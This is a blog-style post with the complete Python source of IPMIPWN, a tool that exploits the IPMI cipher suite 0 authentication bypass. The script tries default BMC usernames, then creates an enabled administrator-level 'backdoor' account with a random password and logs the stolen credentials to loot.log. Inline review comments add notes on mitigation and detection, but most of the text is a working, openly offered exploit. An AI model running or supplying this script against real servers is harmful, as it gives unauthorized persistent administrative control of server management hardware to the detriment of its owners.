There are a few good tools out there (Metasploit) to help you find and identify the IPMI cipher 0 vulnerability, but because it's relatively trivial to exploit I have seen nothing that helps you pwn it. While it is easy to exploit, I have found I keep having to brush up on the commands and junk every time I come across it, which is where my tool comes in.
My IPMIPWN tool does all the real work for you: it will attempt to exploit the cipher 0 vulnerability using a list of predefined default user accounts and set up a backdoor account with a semi-random username and random password. All successful backdoors are logged in loot.log. This tool works best on Kali; it does require you to have ipmiutils (“apt-get install ipmitool”) and NMAP installed. Enjoy.
Requirements:
+ nmap
+ ipmiutils “sudo apt-get install ipmitool”
Usage:
git clone https://github.com/AnarchyAngel/IPMIPWN && cd IPMIPWN
python ipmipwn.py (ip address)
Script:
#!/usr/bin/python
# NOTE(review): the listing on this page is collapsed onto a single line; the
# line breaks and indentation below are reconstructed, the tokens are unchanged.
# Python 2 code: print statements and the `commands` module (removed in 3.x).
#
# Every ipmitool invocation in this file uses `-I lanplus -C 0`, i.e. RMCP+
# cipher suite 0. A BMC that still offers cipher suite 0 does not authenticate
# the session, which is why the `-P hacked` password is an arbitrary
# placeholder. Mitigation: disable cipher suite 0 on the BMC and keep UDP/623
# off untrusted networks. Detection: audit the BMC user table for unexpected
# enabled accounts at privilege level 4 (ADMINISTRATOR), and log RMCP+ session
# opens that negotiate cipher suite 0.
import os, sys, commands, random, string, time

# Candidate BMC account names, tried in this order by FINDUSER.
USERNAMES = ['root','admin','ADMIN', 'ROOT', 'Administrator', 'USERID', 'guest', 'itops.admin', 'ITOps.Admin']

def INIT(HOST, USERNAMES):
    # Driver: liveness check on UDP/623, then account probing, then the
    # account-creation step. DEAD() and FAIL() call exit(), so there is no
    # return path on failure. The USERNAMES parameter shadows the module-level
    # list; the call at the bottom of the file passes that same list.
    print "[*] Checking if "+HOST+" is up..."
    ISON = ALIVECHECK(HOST)
    if ISON == 0:
        DEAD()
    else:
        print "[*] Checking for access..."
        USER=FINDUSER(HOST, USERNAMES)
        print "[*] We have access as "+USER+" :)"
        BACKDOOR(USER, HOST)

def USAGE():
    # Prints banner and usage; invoked when no IP argument is given.
    print "[-] IPMIPWN by Adam Espitia"
    print "[-] aahideaway.blogspot.com"
    print "[-] @anarchyang31"
    print ""
    print "[-] USAGE: python ipmipwn.py <IP>"
    print ""
    print "[-] IPMIPWN will attempt to setup a backdoor on IPMI servers"
    print "[-] exploiting the authentication bypass via cipher 0 vuln."

def BACKDOOR(USER, HOST):
    # Creates a new enabled BMC account with administrator privilege, issuing
    # the commands over a cipher-suite-0 session as the already-confirmed USER.
    print "[*] Setting up backdoor..."
    # `user summary` output is searched for "Enabled User Count :" and
    # count+1 is used as the target user ID. str() of the (status, output)
    # tuple repr-escapes newlines, hence the split on a literal backslash-n.
    # Assumes ID count+1 is an unused slot -- never verified. If the marker
    # text is absent PDATA has one element and PDATA[1] raises IndexError;
    # a non-numeric count raises ValueError.
    RAWDATA = commands.getstatusoutput("ipmitool -I lanplus -C 0 -U "+USER+" -P hacked -H "+HOST+" user summary")
    PDATA = str(RAWDATA).split("Enabled User Count :")
    P2DATA = PDATA[1].split("\\n")
    USERCOUNT = str(int(P2DATA[0].strip())+1)
    # Account name is "backdoor<ID>" -- a predictable artifact that a BMC
    # user-table audit can alert on. Password: 14 chars drawn from [A-Z0-9].
    USERNAME = "backdoor"+USERCOUNT
    PW = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(14))
    # The os.popen pipes are never read, so output and exit status of these
    # four calls are discarded and success is assumed. Privilege 4 is
    # ADMINISTRATOR in ipmitool's numbering.
    os.popen("ipmitool -I lanplus -C 0 -U "+USER+" -P hacked -H "+HOST+" user set name "+USERCOUNT+" "+USERNAME)
    os.popen("ipmitool -I lanplus -C 0 -U "+USER+" -P hacked -H "+HOST+" user set password "+USERCOUNT+" "+PW)
    os.popen("ipmitool -I lanplus -C 0 -U "+USER+" -P hacked -H "+HOST+" user priv "+USERCOUNT+" 4")
    os.popen("ipmitool -I lanplus -C 0 -U "+USER+" -P hacked -H "+HOST+" user enable "+USERCOUNT)
    # Credentials are appended as host:user:password to loot.log in the
    # current working directory via a shell echo -- plaintext on disk.
    os.popen('echo "'+HOST+':'+USERNAME+':'+PW+'" >> loot.log')
    print "[*] Done, access system using ssh as follows:"
    print "[*] ssh "+USERNAME+"@"+HOST
    print "[*] The password is "+PW
    print "[*] Enjoy!"
def ALIVECHECK(HOST):
    # Returns 1 if nmap's output for UDP/623 (RMCP/IPMI) contains "open",
    # else 0. `-sU` needs raw-socket privileges (root). Because this is a
    # substring test, nmap's "open|filtered" UDP state (a port that simply
    # does not answer) also contains "open" and is treated as up.
    # NOTE(review): indentation reconstructed from a collapsed listing.
    OUTPUT = os.popen('nmap -sU -T5 --open -p 623 '+HOST).read()
    PO = str(OUTPUT).find("open")
    #print PO
    if PO == -1:
        return 0
    else:
        return 1

def FINDUSER(HOST, USERNAMES):
    # Tries each candidate name with a cipher-suite-0 `user list`, pausing
    # 5 s between attempts, and returns the first name whose output lacks
    # "Unable to establish IPMI". Any other ipmitool error text is not checked
    # and would also count as success. Each attempt is an RMCP+ session open
    # negotiating cipher suite 0 on UDP/623 -- the event a BMC or network
    # sensor can log and alert on. If no name works, FAIL() exits the process
    # (placed after the loop, matching the stated intent of trying the list).
    for USER in USERNAMES:
        time.sleep(5)
        print "[*] Trying "+USER+"..."
        OUTPUT = commands.getstatusoutput('ipmitool -I lanplus -C 0 -U '+USER+' -P hacked -H '+HOST+' user list')
        #print OUTPUT
        if str(OUTPUT).find("Unable to establish IPMI") == -1:
            return USER
    FAIL()

def FAIL():
    # No candidate account got a session: report and terminate.
    print "[!] Could not get access. :("
    exit()

def DEAD():
    # Liveness check found no open UDP/623: report and terminate.
    print "[!] Host is not listening on port 623"
    exit()

# Script entry. There is no `if __name__ == "__main__"` guard, so importing
# this module runs it; the single positional argument is the target host.
if len(sys.argv) == 1:
    USAGE()
else:
    INIT(sys.argv[1], USERNAMES)
Source: https://github.com/AnarchyAngel